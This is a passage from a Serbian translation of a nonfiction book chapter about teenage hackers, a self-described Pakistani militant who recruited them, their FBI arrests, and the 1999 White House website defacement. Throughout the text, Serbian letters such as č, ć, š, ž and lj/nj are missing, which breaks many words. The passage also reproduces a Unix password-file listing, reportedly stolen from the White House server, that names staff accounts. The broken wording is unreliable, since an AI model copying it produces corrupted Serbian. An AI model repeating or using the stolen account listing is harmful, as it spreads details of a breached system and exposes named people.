prisea se Comrade. To je bila dobra pogodba udima koji se nisu snebivali da prihvate projekte. Ipak, on tvrdi da ga je u iskuee bacio izazov, a ne novac.
32 Umee provale
U stvari, SIPRNET-u sam se dosta primakao. Uao sam u jedan raunarski sistem u DISA (Defense Information Security Agency).Taj raunar je bio izuzetno dobar. Mislim da je imao etiri procesora, oko 2.000 udi je imalo pristup, Unixova datoteka sa IP adresama imala je oko 5.000 razliitih servera, a polovina je koristila privilegovane naloge. Morao si da bude za tim raunarom da bi mu pristupio nisi to mogao da uradi spoa.
Kako god da je to zakuio, Comrade je ispravno slutio da je nabasao na neto bitno. Glavne misije DISA ukuuju zdruenu komandu i kontrolu, i raunarsku podrku jedinicama u borbi mudro preklapae sa funkcijama SIPRNET-a. Meutim, egovi napori su saseeni.
Bilo je simpatino imati sve te pristupe, ali nisam imao dovono vremena da se time poigram i uradim neto. Ukebali su me tri ili etiri dana kasnije.
Vreme za zabrinutost
Na Boi 1999, ne0h i Comrade su doiveli ok. Let IC-814 Indian Airlinesa, na pravcu Katmandu Nju Delhi, sa 178 putnika i 11 lanova posade, otet je u toku leta. Reporteri su javili da su otimai bili pakistanski teroristi povezani s Talibanima. Teroristi kao to je Kalid? Pod komandom otmiara, Airbus A300 nastavio je cik-cak putaom do Sredeg Istoka i nazad, nakratko sletevi u Indiji, Pakistanu i Ujedienim Arapskim Emiratima, gde je izbaeno telo zaklanog putnika. Bio je to mlad ovek koji se sa tek venanom suprugom vraao kui s medenog meseca. On je na smrt izboden jer je odbio da stavi povez na oi. Avion je konano sleteo u Kandahar u Avganistanu to je dodatno ukazivalo na vezu s Talibanima. Preostali putnici i posada zadrani su u avionu tokom osam dana ispuenih terorom, i na kraju su puteni u zamenu za oslobaae tri uhapena militanta. Jedan od osloboenih zatvorenika, eik Umer, kasnije je pomogao u finansirau Mohameda Ate, voe napada na Svetski trgovinski centar 11. septembra.
Nakon otmice, ne0h je saznao od Kalida da je egova grupa odgovorna i da je i on sm uestvovao u otmici.
Na smrt sam se uplaio. On je bio lo. Oseao sam da moram da sauvam ivu glavu.
Ali egovu zabrinutost ublaavala je deaka pohlepa. I dae sam se nadao da e mi isplatiti moj novac, dodao je ne0h. Veza sa otmicom dolila je ue na vatru koju je Kalid ranije zapalio. U jednom trenutku, oigledno iznerviran neuspenim pokuajima tinejdera da mu pribave informacije koje je traio, Kalid je pokuao s taktikom visokog pritiska. Novinar Nil Makaj, u ranije navedenoj prii za wired.com, napisao je da je video staru poruku na IRC-u koju je Kalid poslao ovim mladiima i u kojoj je pretio da e ih ubiti ako ga prijave Federalnom istranom birou. Makaj je napisao da je video i sledeu poruku od Pakistanca: Hou da znam: da li je [iko] priao federalcima o meni? A na drugom mestu: Reci im [ako to urade] da su mrtvi. Nahukau snajperiste na ih.2
Comrade je uhapen
Situacija je postala gusta, a uskoro e se i pogorati. Nekoliko dana poto je Comrade uspeo da prodre u sistem povezan sa SIPRNET-om, egovog oca je na putu do posla zaustavila policija. Rekli su mu: Hoemo da razgovaramo s tvojim sinom, i pokazali mu nalog za pretres. Comrade se prisea:
Bilo je tu udi iz NASA, Ministarstva odbrane, FBI-ja. Sve u svemu, bilo je oko deset ili dvanaest agenata, i nekoliko policajaca. Petao sam po nekim Nasinim sanduiima, postavio sam ukalo na ns3.gtra.mil da bih pokupio lozinke. Ali, tako sam pokupio i e-poruke. Rekli su mi da sam zbog toga optuen za nelegalno prislukivae. A za Nasine raunare dobio sam kree zatienih prava. I druge stvari. Samo dan ranije, prijate mi je rekao: ovee, uskoro e nas uhvatiti. Odlepio je. Pomislio sam: U pravu je. Zato sam obrisao svoj disk.
Meutim, Comrade nije bio temean pri ieu. Zaboravio sam stare diskove koji su mi stajali na stolu.
Ispitivali su me. Priznao sam. Rekao sam: ao mi je. Evo ta sam uradio, evo kako ete popraviti, vie to neu raditi. A oni su rekli, kao: U redu, neemo te tretirati kao kriminalca. Nemoj to vie da radi. Ako to ponovo uradi, ne ginu ti lisice. Spakovali su moje raunare, periferne ureaje i rezervne diskove, i otili.
34 Umee provale
Kasnije su pokuali da nateraju Comradea da im kae lozinku za svoje ifrovane diskove. Kada je odbio, rekli su da znaju kako da ih provale. Comrade je mislio da ne mogu: koristio je PGP ifrovae i lozinka mu je bila duga oko sto znakova. Ipak, on tvrdi da nije bila teka za pamee bila su to egova tri omiena citata spojena u niz. Oko est meseci nije imao kontakta s policijom. A onda je jednog dana uo da e vlada podneti tubu. Do trenutka kada je dospeo na sud, bio je optuen za, kako je tuilac tvrdio, tronedeno iskuivae Nasinih raunara i presretae hiada poruka unutar Ministarstva odbrane. (Kao to i sm vrlo dobro znam, teta koju tuioci navode i stvarna teta ponekad su veoma razliite. Comrade je iz Nasinog centra Marshall Space Flight u Alabami preuzeo softver koji se koristi za kontrolisae temperature i vlanosti u meunarodnoj svemirskoj stanici. Vlada je tvrdila da je zbog toga morala da na tri nedee iskui odreene raunarske sisteme. Napad na Ministarstvo odbrane pruio je realistiniji razlog za brigu: Comrade je provalio u raunarski sistem Odbrambene agencije za ublaavae preti (engl. Defense Threat Reduction Agency) i instalirao zada vrata koja su mu omoguila pristup u bilo koje vreme.) Vlada je oigledno ovaj sluaj smatrala bitnim za upozoravae ostalih hakera tinejdera. U medijima je sueu posveena velika paa i Comrade je proglaen najmlaom osobom koja je ikada osuena za hakerisae kao federalni zloin. Glavni tuilac Denet Rino je ak dala izjavu u kojoj kae: Ovaj sluaj, u kom e prvi put maloletni haker sluiti zatvorsku kaznu, pokazuje da ozbino shvatamo raunarske upade i da sa svojim partnerima iz kriminalistike slube radimo na agresivnoj borbi protiv ovih pojava.
Sudija je Comradea osudio na est meseci zatvora i est meseci uslovne kazne, s poetkom nakon zavretka polugodita. Comradeova majka je tada jo bila iva. Angaovala je novog advokata, napisala mnogo pisama, sudiji je prikazala potpuno nov sluaj i, za divno udo, uspela da smai kaznu na kuni pritvor i potom etiri godine uslovne kazne. Ponekad u ivotu ne koristimo anse koje nam se pruaju. Odsluio sam kuni pritvor i u toku je bila uslovna kazna. Razne stvari su se desile, poeo sam previe da se zabavam, pa su me poslali na rehabilitaciju. Kada je rehabilitacija prola, Comrade se zaposlio u Internet kompaniji i zapoeo sopstveni posao sa Internetom. Meutim, on i slubenik za uslovnu kaznu nisu su previe viali, pa je Comrade na kraju ipak otiao u zatvor. Imao je samo esnaest godina, a zatvoren je za dela koja je poinio kada je imao petnaest. U federalnom kaznenom sistemu nema tako mnogo maloletnika. Ispostavilo se da su ga poslali u kamp (prava re za to mesto) u Alabami, u kom je bilo samo deset zatvorenika. Comrade za kamp kae da je vie nalik koli zakuana vrata i ograda od bodikave ice, ali inae nije imalo mnogo veze sa zatvorom. ak nije morao da ide na asove jer je ve zavrio sredu kolu. Kada se vratio u Majami i na sluee uslovne kazne, Comrade je dobio spisak hakera s kojima ne sme da razgovara. Na listi je pisalo, ovaj tip, onaj tip i ne0h. Samo ne0h federalna vlada ga je znala samo po identifikaciji. Nisu imali pojma ko je on. Ako sam ja imao pristup do dve stotine stvari, on je imao pristup do hiadu, kae Comrade. ne0h je bio prilino vet. Koliko oni znaju, krivini organi jo uvek nisu uspeli da otkriju egovo ime ili lokaciju.
Ispitivae Kalida
Da li je Kalid bio militant kao to je tvrdio, ili samo prevarant koji je manipulisao tinejderima? Ili je to moda bila operacija Federalnog istranog biroa kojom su isprobavali koliko daleko su mladi hakeri voni da idu? Pre ili kasnije, svaki haker koji je imao posla s Kalidom posumao je da on nije zaista bio militantni aktivista. ini se da ih je pomisao da su informacije davali stranom agentu muila mae od mogunosti da ih je taj tip samo navukao. Comrade kae da se najvie pitao ta je [Kalid] bio. Nisam znao da li je federalac ili je bio ono to je tvrdio. Na osnovu
36 Umee provale
razgovora koji su vodili ne0h i Kalid, zakuio sam da ne lae. Ali nikada od ega nisam uzeo novac to je bila granica koju nisam hteo da preem. (Ranije u razgovoru, kada je prvi put pomenuo deset hiada dolara koje je Kalid ponudio, Comrade je zvuao impresioniran sumom. Da li bi odbio novac ukoliko bi egovi pokuaji bili uspeni, a Kalid mu zaista platio? Moda ni sam Comrade ne zna da odgovori na to pitae.) ne0h kae da je Kalid zvuao potpuno profesionalno ali priznaje da se povremeno pitao je li ovaj zaista militantni aktivista. Sve vreme dok sam razgovarao s im, mislio sam da previe baezga. Ali nakon istraivaa s prijateima koji su s im razgovarali i kojima je davao druge informacije, zakuili smo da je zaista bio ono to je tvrdio. Haker Savec0re je na IRC-u sreo nekoga ko je rekao da u FBI ima strica koji bi mogao da sredi imunitet za celu hakersku grupu Milw0rm. Mislim da bismo time poslali poruku FBI-ju da nismo neprijateski nastrojeni, Savec0re je rekao Makaju u intervjuu putem e-pote. Dao sam mu moj broj telefona. Sledeeg dana me je pozvao navodni FBI agent sa zauujue jakim pakistanskim akcentom. Rekao je da se zove Majkl Gordon i da je radio za FBI u Vaingtonu, Savec0re je ispriao novinaru. Shvatio sam da je to sve vreme bio Ibrahim. Mada su se neki udi pitali da li je navodni terorista bio tajni agent Federalnog istranog biroa, Savec0re je doao do suprotnog zakuka: da je tip koji je tvrdio da je FBI agent u stvari isti terorista koji je pokuavao da vidi jesu li su momci spremni da propevaju o emu. Ideja da je to moda bila operacija FBI-ja nema vrste osnove. Ukoliko je federalna vlada htela da otkrije za ta su ovi klinci sposobni i koliko daleko su spremni da idu, obeani novac bi stigao. Kada FBI pomisli da je situacija dovono ozbina da zahteva angaovae tajnog agenta, oni u taj trud ulau novac. Neverovatno bi bilo da su obeali 1000 dolara, a da to nisu platili. Izgleda da je samo jedan haker zaista dobio novac od Kalida Kameleon. Jedno jutro sam otiao do sandueta i u emu je bio ek na hiadu dolara s brojem koji treba da pozovem u Bostonu, ispriao je Kameleon u prii za Wired News (4. novembra 1998). Kalid je saznao da on ima mape vladine raunarske mree ek je bio uplata za te mape. Kameleon je unovio ek. Dve nedee kasnije FBI mu je upao u kuu i ispitivao ga o isplati, to pokree zanimivo pitae o tome kako je vlada saznala za tih hiadu dolara. To se desilo pre 11. septembra,
dok se FBI fokusirao na domai kriminal i slabo pratio teroristike prete. Kameleon je priznao da je uzeo novac, ali je novinaru Wired Newsa tvrdio da nije dao nikakve mape vladine mree. Mada je Kameleon priznao da je uzeo novac od stranog teroriste, za ta bi mogao biti optuen za pijunau i dobiti veoma dugu zatvorsku kaznu, nikakva optunica nije bila podignuta to dae produbuje misteriju. Moda je vlada samo htela da se po hakerskoj zajednici prouje da saraivae sa stranim agentima moe biti rizino. Moda ek i nije bio od Kalida, ve od FBI-ja. Samo nekoliko udi zna Kameleonov pravi identitet, i on bi voleo da tako i ostane. Hteli smo da ujemo egovu verziju prie. Odbio je da govori o tome (samo pomenuvii kako je mislio da je Kalid u stvari federalac koji se predstava kao terorista). Da sam na egovom mestu, ni ja ne bih hteo da me intervjuiu na tu temu.
Organizacija Harkat ul-Mudahedin

Dok je pretraivao dnevnike interaktivnih razgovora na Internetu, novinar Makaj je otkrio da se Kalid jednom prilikom predstavio mladim hakerima kao lan organizacije Harkat-ul-Ansar3. Sudei po Pregledu obavetajne slube June Azije (South Asia Intelligence Review), SAD su proglasile Harkat-ul-Ansar teroristikom organizacijom zbog ihove veze s proteranim saudijskim teroristom Osamom Bin Ladenom 1997. Da bi se izbegle posledice amerike zabrane, grupa je 1998. promenila ime u Harkat ul-Mudahedin.4 Ministarstvo inostranih poslova SAD iznova je upozoravalo na tu grupu. Jedna ihova objava kae: Pakistanski zvaninici su izjavili da su u amerikim vazdunim napadima 23. oktobra [2001] ubijena 22 pakistanska gerilca koji su se borili uz Talibane u blizini Kabula. Poginuli su bili lanovi organizacije Harkat ul-Mudahedin... [koju] je Ministarstvo inostranih poslova postavilo na zvaninu listu teroristikih organizacija 1995.5 Zapravo, Harkat je danas jedna od trideset est grupa koje su u SAD oznaene kao strane teroristike organizacije. Amerika vlada ih, drugim reima, smatra najgorim udima na kugli zemaskoj. Naravno, mladi hakeri to nisu znali. Za ih je sve bila samo igra. Govorei u aprilu 2002. o bezbednosti informacija, general-major indijskih vojnih snaga, potvrdio je da je Kalid terorista, ispriavi o
hakerskim vezama sa Kalidom Ibrahimom iz organizacije Harkat-ulAnsar smetene u Pakistanu.6 General se, meutim, pribojavao da Kalid nije u Pakistanu ve u Delhiju, u Indiji.
Posledice 11. septembra

Neki hakeri manipuliu i obmauju. Oni varaju raunarske sisteme navodei ih da pomisle kako imaju ovlaea koja su zapravo ukrali. Oni vebaju lano predstavae da bi manipulisali udima i postigli svoje cieve. Sve to znai da, kada govorite s hakerom, morate sluati paivo i utvrditi da li ono to vam govori, i nain na koji to govori, zvui uverivo. Ponekad prosto neete biti sigurni. Koautor ove kige i ja nismo bili sigurni u ono to nam je ne0h rekao o svojoj reakciji na 11. septembar. Poverovali smo mu toliko da vam prenesemo egovu izjavu.
38 Umee provale
Znate li koliko sam plakao tog dana? Bio sam siguran da je gotovo s mojim ivotom.
Te rei je propratio udnim, nervoznim smehom s kojim znaeem? Nismo mogli da odredimo.
Pomisao da sam imao veze s tim. Da sam uao u Lockheed Martin ili Boing i doao do jo informacija, mogli su da ih iskoriste. Bilo je to loe vreme za mene i za Ameriku. Plakao sam jer nikada nisam pomislio na to da ga prijavim. Nisam dobro rasuivao. To je bio razlog zbog kog me je angaovao da uradim sve te stvari... [Pomisao] da sam i malim prstom uestvovao u onom to se desilo s Trgovinskim centrom... u potpunosti me je skrhala. U Svetskom trgovinskom centru stradala su tri moja druga. Nikada se nisam oseao tako loe.
Mnogi hakeri su tinejderi, pa ak i mlai. Da li je to prerano da bi se prepoznala potencijalna opasnost ili reagovalo na zahteve nekoga ko bi mogao predstavati pretu zemi? Mislim da su nakon 11. septembra ameriki hakeri ak i oni veoma mladi postali sumiavi i da je malo verovatno da e ih teroristi prevariti. Nadam se da sam u pravu.
Upad u Belu kuu

Istorija raunarske bezbednosti u neku ruku ima slinosti s davnom istorijom kriptografije. Vekovima su udi smiali ifre koje su oznaavali kao nemogue za otkrivae. ak i danas, u eri raunara koji mogu brzo ifrovati poruku pomou kua za jednokratnu upotrebu, ili kua koji sadri stotine znakova, veina kodova i dae se moe deifrovati. (Amerika organizacija za ifrovae i deifrovae, Agencija za nacionalnu bezbednost engl. National Security Agency, razmee se brojem najveih, najbrih i najmonijih raunara na svetu.) Bezbednost raunara je kao stalna igra make i mia u kojoj su struaci za bezbednost na jednoj strani, a upadai na drugoj. Operativni sistem Windows sadri desetine miliona redova koda. Sasvim je jasno da svaki ogroman softver mora da sadri slabosti koje e posveeni hakeri pre ili kasnije otkriti. U meuvremenu, radnici u kompanijama, inovnici, ponekad i profesionalci u oblasti bezbednosti, instalirae nov raunar ili program i zaboraviti da promene podrazumevanu ifru, ili se nee potruditi da smisle ifru koja je bar donekle sigurna ostavajui ureaj u raivom stau. Ako itate vesti o hakerskim napadima i upadima, znate da su vojne i vladine prezentacije, ak i Web prezentacija Bele kue, ve ugroene. Ponekad neprestano. Upad na prezentaciju i meae Web strane je jedno to je uglavnom trivijalna, ili bar dosadna stvar. I pored toga, mnogi udi se oslaaju na samo jednu lozinku koju koriste svuda. Ukoliko provaivae u Web prezentaciju vodi do hvataa lozinki, napada moe dospeti u situaciju da ima pristup ostalim sistemima u mrei i moe da napravi mnogo veu tetu. ne0h kae da su 1999. godine on i jo dva lana hakerske grupe gLobaLheLL uradili upravo to, na jednom od najosetivijih mesta u SAD-u u Beloj kui.
Mislim da su u Beloj kui reinstalirali operativni sistem. Sve su vratili na podrazumevane vrednosti. I u tom periodu, u trajau od deset, petnaest minuta, Zyklon i MostFearD uspeli su da uu, dou do skrivene datoteke lozinki, provale je, uu, i promene Web prezentaciju. Bio sam tamo dok su to radili. Trebalo je samo da budu na pravom mestu u pravo vreme. Desilo se sluajno bila je ista srea da su se zadesili na vezi ba kada je neko radio na prezentaciji.
O tome smo priali u priaonici grupe gLobaLheLL. Probudio me poziv oko 3 ujutro kojim su me obavestili ta se deava. Rekao sam: Baezga. Dokai. Skoio sam za raunar. I stvarno, uradili su to. MostFearD i Zyklon obavili su najvei deo posla. Dali su mi skrivenu datoteku da je provalim to bre mogu. Doao sam do jedne [lozinke] bila je to obina re iz renika. I to je bilo to.
40 Umee provale
ne0h nam je dao deo koda za koji kae da je datoteka lozinke koju su ostali nabavili i preneli mu. U oj je naizgled nabrojano nekoliko ovlaenih korisnika, lanova osoba Bele kue7:
root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:6001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/: bing:x:1001:10:Bing Feraren:/usr/users/bing:/bin/sh orion:x:1002:10:Christopher Adams:/usr/users/orion:/usr/ace/sdshell webadm:x:1130:101:Web Administrator:/usr/users/webadm:/bin/sh cadams:x:1003:10:Christopher Adams:/usr/users/cadams:/usr/ace/sdshell bartho_m:x:1004:101:Mark Bartholomew:/usr/users/bartho_m:/usr/ace/sdshell monty:x:1139:101:Monty Haymes:/usr/users/monty:/bin/sh debra:x:1148:101:Debra Reid:/usr/users/debra:/bin/sh connie:x:1149:101:Connie Colabatistto:/usr/users/connie:/bin/sh bill:x:1005:101:William Hadley:/usr/users/bill:/bin/sh
Ovo je vrsta Unixove ili Linuxove datoteke lozinki, kakva se koristi za skladitee ifrovanih lozinki u posebnoj, zatienoj datoteci. Svaki red navodi ime jedne osobe koja ima nalog na sistemu. Unos sdshell u
nekim redovima nagovetava da ti korisnici, zbog dodatne sigurnosti, imaju mali elektronski ureaj nazvan RSA SecureID. On prikazuje estocifreni broj koji se mea svakih ezdeset sekundi. Da bi se prijavili, ti korisnici moraju da unesu estocifreni broj koji je u tom trenutku prikazan na ihovom ureaju SecureID, i lini identifikacioni broj, PIN (koji ponegde dodeuje kompanija, a nekad ga bira sam korisnik). Web prezentaciji Bele kue promeena je matina strana u isto vreme kada je na u provaeno, kao dokaz da su hakeri bili tu, objasnio je ne0h. Dao nam je i vezu do upotrebene strane (slika 2-1).8 Pored simbola hakerske grupe gLobaLheLL, poruka sadri i logotip Hong Kong Danger Duo. To je, kae ne0h, lano ime koje je izmieno kako bi se dodao jo jedan element za obmaivae.
Slika 2-1: Strana kojom je zameena Web prezentacija Bele kue, maj 1999.
Koliko se ne0h sea, momci odgovorni za ovaj upad na prezentaciju Bele kue nisu bili naroito ushieni to su uspeli da upadnu na jednu
42 Umee provale
od otprilike deset najsigurnijih Web prezentacija u zemi. Bili su prilino zauzeti upadaem svuda, objasnio je ne0h, da bi svetu dokazali da smo najboi. Umesto opteg virtuelnog tapaa po ramenu, on kae da se atmosfera moe boe opisati kao: Dobro obaven posao, momci, najzad smo uspeli, ta je sledee? Ali nije im ostalo mnogo vremena za bilo kakve druge upade. Njihovi svetovi su se ubrzo sruili, a taj deo prie nas ponovo vraa na misterioznog Kalida. Zyklon, inae poznat kao Erik Barns, odavde preuzima priu. Kae da nikada zaista nije bio lan grupe gLobaLheLL, ali je visio po IRC prezentacijama s nekim enim lanovima. Kako on opisuje dogaaje, upad u prezentaciju Bele kue postao je mogu kada je otkrio da je ona mogla biti ugroena korieem rupe u programu PHF za pristup telefonskom imeniku postavenom na Web. To je bila najbitnija slabost ali, mada su u hakerskoj zajednici znali za u, nije je koristilo mnogo udi, kae Zyklon. Izvodei vie koraka (detano su objaeni u odeku Saetak, kasnije u ovom poglavu), mogao je da zauzme osnovni direktorijum lokacije whitehouse.gov i obezbedi pristup drugim sistemima na lokalnoj mrei, ukuujui server za e-potu Bele kue. Zyklon je u tom trenutku mogao da presretne poruke izmeu osoba Bele kue i javnosti, mada te poruke, naravno, ne bi otkrile nikakve poverive informacije. Meutim, Zyklon je rekao da je mogao i da doe do kopije lozinke i skrivenih datoteka. Vrali su po prezentaciji, gledali ta mogu da pronau i ekali da udi ponu da dolaze na posao. Dok je ekao, dobio je poruku od Kalida koji mu je rekao da pie lanak o nedavnim upadima i pitao Zyklona da li je nedavno imao akcije o kojima bi govorio. I onda sam mu rekao da smo upravo upali na Web prezentaciju Bele kue, ispriao je Zyklon. Zyklon mi je rekao da je u roku od par sati ihov program za praee protoka podataka primeen administrator sistema je pokuavao da otkrije ta se deava i ue u trag udima koji su bili na prezentaciji. Puka sluajnost? Ili je ba tad imao neki razlog da postane sumiav? Proli su meseci pre nego to je Zyklon pronaao odgovor. Ali tada, im je prislukiva otkriven, momci su se povukli s prezentacije i nadali se da su pretekli administratora.
Meutim, anuli su u osie gnezdo. Oko dve nedee kasnije, FBI se ustremio na sve lanove grupe gLobaLheLL koje su mogli da identifikuju. Pored Zyklona tada je imao 19 godina i uhapen je u dravi Vaington uhapeni su i MostHateD (Patrik Gregori, takoe 19 godina, iz Teksasa), MidPhasr (ad Dejvis iz Viskonsina), i drugi. ne0h je bio meu par hakera koji su preiveli napad. Sa bezbedne udaene lokacije on je, razjaren, postavio stranu na Web prezentaciju sa prkosnom porukom. Ona je u prvom trenutku glasila: Sluajte vi gadovi iz FBI. Ne z_ se s naim lanovima jer ete izgubiti. Dok ovo piem mi drimo fbi.gov. UPLAILI STE SE. Uhapeni smo jer vai glupi idioti ne mogu da ukapiraju ko je upo u belu kuu... jel tako? pa ste nas sve uorkirali da vidite jel e neko da ga otkuca. PUNO J_ SREE. MI NISMO CINKAROI. Kapirate? REKAO SAM DOMINACIJA SVETOM. I potpisao je: Nemilosrdni ne0h.9
Posledice
Kako se desilo da je administrator sistema tako rano ujutro poeo da uka? Zyklon se nimalo ne dvoumi oko odgovora. Kada su tuioci sakupili dokumente za ovaj sluaj, pronaao je izjavu da su informacije koje su vodile do saznaa vezanih za upad grupe gLobaLheLL u prezentaciju Bele kue, dobijene od dounika FBI-ja. Koliko se on sea, u dokumentu je pisalo i da se taj dounik nalazio u Nju Delhiju, u Indiji. Po Zyklonovom mieu, nije bilo nikakve sume. Jedina osoba kojoj je rekao za upad u Belu kuu jedina osoba bio je Kalid Ibrahim. Jedan plus jedan jesu dva: Kalid je bio dounik FBI. Ali misterija ostaje. ak i ako je Zyklon u pravu, da li je to cela pria? Kalid je bio dounik, pomagao je FBI-ju da pronae klince hakere koji su bili raspoloeni da upadaju na osetive prezentacije? Ili moda postoji jo jedno mogue objaee: da je egova uloga dounika bila samo pola prie, a da je on zapravo bio i pakistanski terorista, kao to je mislio indijski general. ovek koji igra dvostruku ulogu: pomae interesima Talibana dok je infiltriran u FBI. Njegov strah da e ga neki klinac prijaviti FBI-ju uklapa se u ovu verziju prie.
Samo nekoliko udi zna istinu. Pitae je da li su meu ima i agenti FBI i federalni tuioci koji su ukueni u sluaj. Ili su i oni nasamareni? Na kraju, Patrik Gregori i ad Dejvis osueni su na dvadeset est meseci, a Zyklon Barns na petnaest. Sva trojica su odsluila kazne i vie nisu u zatvoru.
Pet godina kasnije

44 Umee provale
Dani hakerisaa su za Comradea uglavnom samo seae, ali egov glas ivne kada govori o uzbueu zbog sr_ koja ne biste smeli da pravite, odlaska na mesta na kojima ne biste smeli da budete, nadajui se da ete naii na neto kul. Ipak, vreme je da se pone sa ivotom. On kae da razmia o fakultetu. Kada smo razgovarali, upravo se vratio iz skautske kole u Izraelu. Jezik mu nije bio prevelik problem uio je hebrejski u osnovnoj koli i iznenadio se koliko je mnogo zapamtio. Njegovi utisci o toj zemi su pomeani. Devojke su bile ba super, a Izraelci su pokazali da veoma vole Ameriku. ini se da se ugledaju na Amerikance. Na primer, provodio je vreme s nekim Izraelcima koji su pili sok RC Cola za koji nikada nije uo, a ispostavilo se da se pravi u Americi. Izraelci su objasnili: To je ono to Amerikanci piju u reklamama. Nailazio je i na antiamerike stavove udi koji se ne slau sa amerikom politikom, ali to ga nije omelo: Pretpostavam da toga ima svuda. Vreme mu se nimalo nije dopalo bilo je hladno i kiovito dok je bio tamo. A onda, bio je tu i problem s raunarima. Zbog puta je kupio prenosivi raunar i beinu mrenu karticu, ali je otkrio da su zgrade napravene od ogromnog kamea. Njegov raunar je mogao da vidi pet ili deset mrea, ali su signali bili previe slabi za povezivae i morao je da peai dvadeset minuta da bi doao do mesta na kom se moe prijaviti na mreu. Comrade je sada u Majamiju. Tinejder s dosijeom prestupnika sada ivi od nasledstva i pokuava da odlui da li e ii na fakultet. Ima dvadeset godina i uglavnom ne radi nita. Comradeov drugar ne0h radi za veliku telekomunikacionu kompaniju (kae da posao s radnim vremenom od devet do pet nije dobar), ali e uskoro otii u Los Aneles na tri meseca fizikog rada jer plaaju
mnogo vie nego to sada zarauje. Nada se da e, kao i veina obinih udi, uspeti da utedi dovono za otplaivae kue u kojoj trenutno ivi. Kada se tromeseni, dobro plaen posao zavri, i ne0h razmia o studirau ali ne planira da studira raunarske nauke. Veina udi s takvim diplomama koje sam sreo nema pojma, rekao je. Umesto toga, on bi voleo da studira poslovni i organizacioni menadment, a onda da se raunarima bavi na poslovnom nivou. Govorei o svojim ranijim avanturama, on ponovo pomie svoju okupiranost Kevinom. Do koje mere je zamiao da ide mojim stopama?
Da li sam eleo da budem uhvaen? I jesam i nisam. Ako me uhvate, to bi bio dokaz da mogu to da uradim i da sam to uradio. Nije ba da sam namerno hteo da me uhvate. Hteo sam da me uhvate da bih se borio, oslobodio i onda bio haker koji je umakao. Izaao bih, naao dobar posao u nekoj vladinoj agenciji i uklopio bih se s podzemem.
Koliko je preta velika

Kombinacija odlunih terorista i neustraivih klinaca hakera mogla bi biti katastrofalna za Ameriku. Ova pria me je naterala da se zapitam koliko drugih Kalida regrutuje klince (ili nepatriotski nastrojene odrasle sa hakerskim sposobnostima), gladne novca, priznaa ili zadovostva za uspeno obavene teke zadatke. Vrbovnici posle Kalida moda e biti tajanstveniji i nee se moi tako lako otkriti. Kada sam bio u pritvoru pre suea, nekoliko puta mi je prilazio kolumbijski kra droge. Sledovala mu je doivotna robija u federalnom zatvoru bez mogunosti uslovne kazne. Ponudio mi je primamiv posao: platie mi 5 miliona dolara u gotovom za upad u Sentry raunarski sistem Federalnog biroa za zatvore i egovo oslobaae iz zatvora. Taj tip je bio stvaran i smrtno ozbian. Nisam prihvatio egovu ponudu, ali sam ostavio utisak da u mu pomoi kako bih izbegao sukob. Pitam se ta bi ne0h uradio u slinoj situaciji. Ameriki neprijatei moda treniraju svoje vojnike za kompjutersko ratovae kojim bi napali ameriku infrastrukturu i odbranili svoju. Ne morate biti mudrac da biste shvatili da takve grupe mogu angaovati umene hakere iz bilo kog dela sveta radi obuke, ili za projekte koji su bitni za misije.
46 Umee provale
Godine 1997. i ponovo 2003, Ministarstvo odbrane je pokrenulo operaciju Eligible Receiver pokuaj da se proveri osetivost nacije na elektronski napad. U lanku Washington Timesa10 o ranijem ovakvom pokuaju, objaveno je: Vii rukovodioci Pentagona bili su zapaeni vojnom vebom koja je pokazala koliko je hakerima lako da obogae amerike vojne i civilne raunarske mree. lanak objaava da je Agencija za nacionalnu bezbednost okupila grupu svojih specijalista za raunare u crveni tim hakera i omoguila im da koriste samo raunarsku opremu koja je dostupna i javnosti, i sve alate za hakerisae, ukuujui kd za zloupotrebe koji su mogli preuzeti sa Interneta ili elektronskih oglasnih tabli. Za nekoliko dana, hakeri iz crvenog tima infiltrirali su se u raunarske sisteme za upravae delovima nacionalne elektrodistribucijske mree i pomou nekoliko komandi mogli su da zamrae itave delove zeme. Da ovo nije bila veba, objavio je Christian Science Monitor, oni su mogli da poremete sistem komunikacije Ministarstva odbrane (i preuzmu najvei deo Pacifike komande) i pristupe raunarskim sistemima na brodovima amerike mornarice.11 Lino sam mogao da pobedim bezbednosne mehanizme telefonskih centrala napravenim u kompaniji Baby Bells i kontroliem pristup tim centralama. Pre deset godina imao sam potpunu kontrolu nad veinom centrala koje su odravale kompanije Pacific Bell, Sprint, GTE i druge. Zamislite haos koji bi snalaiva grupa terorista mogla da napravi kada bi imala takav pristup. lanovi organizacije Al Kaida i drugih teroristikih grupa i ranije su koristile raunarske mree pri planirau teroristikih napada. Postoje dokazi da su teroristi koristili Internet prilikom planiraa operacija za napade 11. septembra. Ako je Kalid Ibrahim i bio uspean u dobijau informacija preko pomenutih hakera, to niko ne obelodauje. Nedostaje konaan dokaz da je on zaista bio povezan s napadima na Svetski trgovinski centar i Pentagon. Ipak, niko ne zna da li e se on ili neko slian ponovo pojaviti na kibernetikoj sceni, traei naivne pomagae koje uzbuuje pravee sr_ koja ne biste smeli da pravite, odlazak na mesta na kojima ne biste smeli da budete. Klince koji bi mogli pomisliti da je ponueni izazov kul.
Za mlade hakere, slaba bezbednost ostaje neprekidan podsticaj. Pa ipak, hakeri iz ove prie trebalo je da prepoznaju opasnost kada ih je strani dravanin regrutovao za kompromitovae osetivih amerikih raunarskih mrea. Moram se zapitati koliko e drugih mladia kao to je ne0h neprijate regrutovati. U svetu punom terorista, dobra bezbednost nikada nije bila toliko bitna kao danas.
SAETAK
